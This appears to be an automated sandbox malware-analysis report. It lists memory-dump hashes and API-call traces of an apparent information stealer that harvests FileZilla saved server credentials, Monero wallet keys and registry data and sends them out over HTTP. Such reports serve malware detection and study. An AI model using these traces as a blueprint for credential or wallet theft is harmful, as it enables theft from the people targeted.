                                    • Instruction Fuzzy Hash: 87A16E72E083119BD308CF25C89075BF7E2EFC8710F5ACA3EA89997254D774E9419B82
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 8251e9103386f6c0f906bfb03d9dd32a1afeef8780a9a251416f335c71d539ae
                                    • Instruction ID: 924518d98cf74d25a056b55ae1fb8226a8f281c16d93c3887b75654f644d7151
                                    • Opcode Fuzzy Hash: 8251e9103386f6c0f906bfb03d9dd32a1afeef8780a9a251416f335c71d539ae
                                    • Instruction Fuzzy Hash: 885148B3E046208BE354AE28DC853A7F795EB44320F2B463DDE9857780D93A5C1487C6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                                    • Instruction ID: 6ed4f9ea0d2615a361e419aa15179b8c40e89e8b327a560db8f23c90dfd52735
                                    • Opcode Fuzzy Hash: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                                    • Instruction Fuzzy Hash: 42516962E19BD985C7058F7944502EEBFB21FE6200F2E829EC4981B3C3C2759699C3E5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: bf833a3c415f313c0e90d3abe1db9af196622bc72ce38e1659362fc672a311e6
                                    • Instruction ID: 1b4ca807f63da42af8b9cfa983886534e0281b6e8e426886dc5ac129e39ce39b
                                    • Opcode Fuzzy Hash: bf833a3c415f313c0e90d3abe1db9af196622bc72ce38e1659362fc672a311e6
                                    • Instruction Fuzzy Hash: 7D3106F240C602EBDB08BF28DC6473AB7EABB54710F26853DDAC347A44E93555129687
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: fa89f657aff6296ecb1601ee23405aced359b6e8af49850df061194d60f6f807
                                    • Instruction ID: 4d4380f719737e920eca18c290049424b63e8615d1407fedd07d3ef3da97591e
                                    • Opcode Fuzzy Hash: fa89f657aff6296ecb1601ee23405aced359b6e8af49850df061194d60f6f807
                                    • Instruction Fuzzy Hash: E5D0C9716097114FC3688F1EB440946FAE8DBD8320715C53FA09AC3750C6B094418B54
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                    • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                    • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                    • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                    APIs
                                      • Part of subcall function 001AAA50: lstrcpy.KERNEL32(001B0E1A,00000000), ref: 001AAA98
                                      • Part of subcall function 001A8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 001A8F9B
                                      • Part of subcall function 001AAC30: lstrcpy.KERNEL32(00000000,?), ref: 001AAC82
                                      • Part of subcall function 001AAC30: lstrcat.KERNEL32(00000000), ref: 001AAC92
                                      • Part of subcall function 001AABB0: lstrcpy.KERNEL32(?,001B0E1A), ref: 001AAC15
                                      • Part of subcall function 001AACC0: lstrlen.KERNEL32(?,00E290E0,?,\Monero\wallet.keys,001B0E1A), ref: 001AACD5
                                      • Part of subcall function 001AACC0: lstrcpy.KERNEL32(00000000), ref: 001AAD14
                                      • Part of subcall function 001AACC0: lstrcat.KERNEL32(00000000,00000000), ref: 001AAD22
                                      • Part of subcall function 001AAAB0: lstrcpy.KERNEL32(?,00000000), ref: 001AAAF6
                                      • Part of subcall function 0019A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0019A13C
                                      • Part of subcall function 0019A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0019A161
                                      • Part of subcall function 0019A110: LocalAlloc.KERNEL32(00000040,?), ref: 0019A181
                                      • Part of subcall function 0019A110: ReadFile.KERNEL32(000000FF,?,00000000,0019148F,00000000), ref: 0019A1AA
                                      • Part of subcall function 0019A110: LocalFree.KERNEL32(0019148F), ref: 0019A1E0
                                      • Part of subcall function 0019A110: CloseHandle.KERNEL32(000000FF), ref: 0019A1EA
                                      • Part of subcall function 001A8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 001A8FE2
                                    • GetProcessHeap.KERNEL32(00000000,000F423F,001B0DBF,001B0DBE,001B0DBB,001B0DBA), ref: 001A04C2
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 001A04C9
                                    • StrStrA.SHLWAPI(00000000,<Host>), ref: 001A04E5
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001B0DB7), ref: 001A04F3
                                    • StrStrA.SHLWAPI(00000000,<Port>), ref: 001A052F
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001B0DB7), ref: 001A053D
                                    • StrStrA.SHLWAPI(00000000,<User>), ref: 001A0579
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001B0DB7), ref: 001A0587
                                    • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 001A05C3
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001B0DB7), ref: 001A05D5
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001B0DB7), ref: 001A0662
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001B0DB7), ref: 001A067A
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001B0DB7), ref: 001A0692
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001B0DB7), ref: 001A06AA
                                    • lstrcat.KERNEL32(?,browser: FileZilla), ref: 001A06C2
                                    • lstrcat.KERNEL32(?,profile: null), ref: 001A06D1
                                    • lstrcat.KERNEL32(?,url: ), ref: 001A06E0
                                    • lstrcat.KERNEL32(?,00000000), ref: 001A06F3
                                    • lstrcat.KERNEL32(?,001B1770), ref: 001A0702
                                    • lstrcat.KERNEL32(?,00000000), ref: 001A0715
                                    • lstrcat.KERNEL32(?,001B1774), ref: 001A0724
                                    • lstrcat.KERNEL32(?,login: ), ref: 001A0733
                                    • lstrcat.KERNEL32(?,00000000), ref: 001A0746
                                    • lstrcat.KERNEL32(?,001B1780), ref: 001A0755
                                    • lstrcat.KERNEL32(?,password: ), ref: 001A0764
                                    • lstrcat.KERNEL32(?,00000000), ref: 001A0777
                                    • lstrcat.KERNEL32(?,001B1790), ref: 001A0786
                                    • lstrcat.KERNEL32(?,001B1794), ref: 001A0795
                                    • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001B0DB7), ref: 001A07EE
                                    Strings
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                    • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                    • API String ID: 1942843190-555421843
                                    • Opcode ID: 5f45f72b1a0315ed598bd037d1f4b9309f046dba6217440e7be5c63296f5bad4
                                    • Instruction ID: a6a998dc28f745b4adb40851d032d1eff1e09bc98835a25c611788b38e5b390a
                                    • Opcode Fuzzy Hash: 5f45f72b1a0315ed598bd037d1f4b9309f046dba6217440e7be5c63296f5bad4
                                    • Instruction Fuzzy Hash: 16D14379D10208ABCB44EBF0DD66EEE7739AF29300F908554F102B7195EF74AA44CB65
                                    APIs
                                      • Part of subcall function 001AAAB0: lstrcpy.KERNEL32(?,00000000), ref: 001AAAF6
                                      • Part of subcall function 00194800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00194889
                                      • Part of subcall function 00194800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00194899
                                      • Part of subcall function 001AAA50: lstrcpy.KERNEL32(001B0E1A,00000000), ref: 001AAA98
                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00195A48
                                    • StrCmpCA.SHLWAPI(?,00E2EBB0), ref: 00195A63
                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00195BE3
                                    • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,00E2EB60,00000000,?,00E2AB08,00000000,?,001B1B4C), ref: 00195EC1
                                    • lstrlen.KERNEL32(00000000), ref: 00195ED2
                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00195EE3
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00195EEA
                                    • lstrlen.KERNEL32(00000000), ref: 00195EFF
                                    • lstrlen.KERNEL32(00000000), ref: 00195F28
                                    • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00195F41
                                    • lstrlen.KERNEL32(00000000,?,?), ref: 00195F6B
                                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00195F7F
                                    • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00195F9C
                                    • InternetCloseHandle.WININET(00000000), ref: 00196000
                                    • InternetCloseHandle.WININET(00000000), ref: 0019600D
                                    • HttpOpenRequestA.WININET(00000000,00E2EA50,?,00E2E2C0,00000000,00000000,00400100,00000000), ref: 00195C48
                                      • Part of subcall function 001AACC0: lstrlen.KERNEL32(?,00E290E0,?,\Monero\wallet.keys,001B0E1A), ref: 001AACD5
                                      • Part of subcall function 001AACC0: lstrcpy.KERNEL32(00000000), ref: 001AAD14
                                      • Part of subcall function 001AACC0: lstrcat.KERNEL32(00000000,00000000), ref: 001AAD22
                                      • Part of subcall function 001AABB0: lstrcpy.KERNEL32(?,001B0E1A), ref: 001AAC15
                                      • Part of subcall function 001AAC30: lstrcpy.KERNEL32(00000000,?), ref: 001AAC82
                                      • Part of subcall function 001AAC30: lstrcat.KERNEL32(00000000), ref: 001AAC92
                                    • InternetCloseHandle.WININET(00000000), ref: 00196017
                                    Strings
                                    Yara matches
                                    Similarity
                                    • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                    • String ID: "$"$------$------$------$P$P$`
                                    • API String ID: 874700897-3695623986
                                    • Opcode ID: 83ec64a663779f1c22d37638383dd91627d87f2b6128ecc1b423f13a280e7b9b
                                    • Instruction ID: 0b3fc10ccd82be2e08af550f02a4ce8ec9fb96ac5c80105987fb87b1a61c4cc2
                                    • Opcode Fuzzy Hash: 83ec64a663779f1c22d37638383dd91627d87f2b6128ecc1b423f13a280e7b9b
                                    • Instruction Fuzzy Hash: 66121E75960118ABCB55EBA0DCA6FEEB379BF25700F8041A9F10663191EF702B48CF65
                                    APIs
                                      • Part of subcall function 001AAA50: lstrcpy.KERNEL32(001B0E1A,00000000), ref: 001AAA98
                                      • Part of subcall function 001AACC0: lstrlen.KERNEL32(?,00E290E0,?,\Monero\wallet.keys,001B0E1A), ref: 001AACD5
                                      • Part of subcall function 001AACC0: lstrcpy.KERNEL32(00000000), ref: 001AAD14
                                      • Part of subcall function 001AACC0: lstrcat.KERNEL32(00000000,00000000), ref: 001AAD22
                                      • Part of subcall function 001AABB0: lstrcpy.KERNEL32(?,001B0E1A), ref: 001AAC15
                                      • Part of subcall function 001A8CF0: GetSystemTime.KERNEL32(001B0E1B,00E2AB38,001B05B6,?,?,001913F9,?,0000001A,001B0E1B,00000000,?,00E290E0,?,\Monero\wallet.keys,001B0E1A), ref: 001A8D16
                                      • Part of subcall function 001AAC30: lstrcpy.KERNEL32(00000000,?), ref: 001AAC82
                                      • Part of subcall function 001AAC30: lstrcat.KERNEL32(00000000), ref: 001AAC92
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0019D083
                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0019D1C7
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 0019D1CE
                                    • lstrcat.KERNEL32(?,00000000), ref: 0019D308
                                    • lstrcat.KERNEL32(?,001B1570), ref: 0019D317
                                    • lstrcat.KERNEL32(?,00000000), ref: 0019D32A
                                    • lstrcat.KERNEL32(?,001B1574), ref: 0019D339
                                    • lstrcat.KERNEL32(?,00000000), ref: 0019D34C
                                    • lstrcat.KERNEL32(?,001B1578), ref: 0019D35B
                                    • lstrcat.KERNEL32(?,00000000), ref: 0019D36E
                                    • lstrcat.KERNEL32(?,001B157C), ref: 0019D37D
                                    • lstrcat.KERNEL32(?,00000000), ref: 0019D390
                                    • lstrcat.KERNEL32(?,001B1580), ref: 0019D39F
                                    • lstrcat.KERNEL32(?,00000000), ref: 0019D3B2
                                    • lstrcat.KERNEL32(?,001B1584), ref: 0019D3C1
                                    • lstrcat.KERNEL32(?,00000000), ref: 0019D3D4
                                    • lstrcat.KERNEL32(?,001B1588), ref: 0019D3E3
                                      • Part of subcall function 001AAB30: lstrlen.KERNEL32(00194F55,?,?,00194F55,001B0DDF), ref: 001AAB3B
                                      • Part of subcall function 001AAB30: lstrcpy.KERNEL32(001B0DDF,00000000), ref: 001AAB95
                                    • lstrlen.KERNEL32(?), ref: 0019D42A
                                    • lstrlen.KERNEL32(?), ref: 0019D439
                                      • Part of subcall function 001AAD80: StrCmpCA.SHLWAPI(00000000,001B1568,0019D2A2,001B1568,00000000), ref: 001AAD9F
                                    • DeleteFileA.KERNEL32(00000000), ref: 0019D4B4
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                    • String ID:
                                    • API String ID: 1956182324-0
                                    • Opcode ID: 1a16ab7ddd4a48ccb42331f36b0b380b85a48af2271e8b9f4a8f3b26a5984f88
                                    • Instruction ID: 45c7c2c29f80e01ac4e789efe87dd3228c37d3241f23d2b23073181ed91e6298
                                    • Opcode Fuzzy Hash: 1a16ab7ddd4a48ccb42331f36b0b380b85a48af2271e8b9f4a8f3b26a5984f88
                                    • Instruction Fuzzy Hash: E2E15175910108ABCB54EBA0DDA6EEE7379AF25301F5045A8F106770A1EF71BE08CB76
                                    APIs
                                      • Part of subcall function 001AAA50: lstrcpy.KERNEL32(001B0E1A,00000000), ref: 001AAA98
                                    • RegOpenKeyExA.ADVAPI32(00000000,00E2B870,00000000,00020019,00000000,001B05BE), ref: 001A8534
                                    • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 001A85B6
                                    • wsprintfA.USER32 ref: 001A85E9
                                    • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 001A860B
                                    • RegCloseKey.ADVAPI32(00000000), ref: 001A861C
                                    • RegCloseKey.ADVAPI32(00000000), ref: 001A8629
                                      • Part of subcall function 001AAAB0: lstrcpy.KERNEL32(?,00000000), ref: 001AAAF6
                                    Strings
                                    Yara matches
                                    Similarity
                                    • API ID: CloseOpenlstrcpy$Enumwsprintf
                                    • String ID: - $%s\%s$?$p$
                                    • API String ID: 3246050789-3612168314
                                    • Opcode ID: 634bf937207bab6c20ef6f081c88be814b196952b53a6c607809258eb5c40f90
                                    • Instruction ID: 08b8100a08def012a66ad2da8e76029e332cefba6112b7d96857ad33f6d0ea84
                                    • Opcode Fuzzy Hash: 634bf937207bab6c20ef6f081c88be814b196952b53a6c607809258eb5c40f90
                                    • Instruction Fuzzy Hash: A6812A75910218ABDB68DF54CD91FEAB7B8BF19700F5082D8E10AA6180DF706F84CFA5
                                    APIs
                                      • Part of subcall function 001AAA50: lstrcpy.KERNEL32(001B0E1A,00000000), ref: 001AAA98
                                      • Part of subcall function 001AAC30: lstrcpy.KERNEL32(00000000,?), ref: 001AAC82
                                      • Part of subcall function 001AAC30: lstrcat.KERNEL32(00000000), ref: 001AAC92
                                      • Part of subcall function 001AABB0: lstrcpy.KERNEL32(?,001B0E1A), ref: 001AAC15
                                      • Part of subcall function 001AACC0: lstrlen.KERNEL32(?,00E290E0,?,\Monero\wallet.keys,001B0E1A), ref: 001AACD5
                                      • Part of subcall function 001AACC0: lstrcpy.KERNEL32(00000000), ref: 001AAD14
                                      • Part of subcall function 001AACC0: lstrcat.KERNEL32(00000000,00000000), ref: 001AAD22
                                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,00E2D040,00000000,?,001B1544,00000000,?,?), ref: 0019CB6C
                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0019CB89
                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 0019CB95
                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0019CBA8
                                    • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0019CBD9
                                    • StrStrA.SHLWAPI(?,00E2CFF8,001B0B56), ref: 0019CBF7
                                    • StrStrA.SHLWAPI(00000000,00E2D130), ref: 0019CC1E
                                    • StrStrA.SHLWAPI(?,00E2DEC8,00000000,?,001B1550,00000000,?,00000000,00000000,?,00E29170,00000000,?,001B154C,00000000,?), ref: 0019CDA2
                                    • StrStrA.SHLWAPI(00000000,00E2DE88), ref: 0019CDB9
                                      • Part of subcall function 0019C920: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0019C971
                                      • Part of subcall function 0019C920: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0019C97C
                                    • StrStrA.SHLWAPI(?,00E2DE88,00000000,?,001B1554,00000000,?,00000000,00E291E0), ref: 0019CE5A
                                    • StrStrA.SHLWAPI(00000000,00E28F20), ref: 0019CE71
                                      • Part of subcall function 0019C920: lstrcat.KERNEL32(?,001B0B47), ref: 0019CA43
                                      • Part of subcall function 0019C920: lstrcat.KERNEL32(?,001B0B4B), ref: 0019CA57
                                      • Part of subcall function 0019C920: lstrcat.KERNEL32(?,001B0B4E), ref: 0019CA78
                                    • lstrlen.KERNEL32(00000000), ref: 0019CF44
                                    • CloseHandle.KERNEL32(00000000), ref: 0019CF9C
                                    Strings
                                    Yara matches
                                    Similarity
                                    • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                    • String ID:
                                    • API String ID: 3744635739-3916222277
                                    • Opcode ID: 0d15947327f5c3945aa4fcb54e8913a80a26e54646c65df65833f1f4caa7b7cc
                                    • Instruction ID: 6a1926fd56dc878701c1bc5d9441354a06652b1ce8cb6a5d58c4b95735e259f3
                                    • Opcode Fuzzy Hash: 0d15947327f5c3945aa4fcb54e8913a80a26e54646c65df65833f1f4caa7b7cc
                                    • Instruction Fuzzy Hash: C4E11E75910108ABCB54EFA4DCA2FEEB779AF25300F8041A9F10663191EF707A49CF66
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                     • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
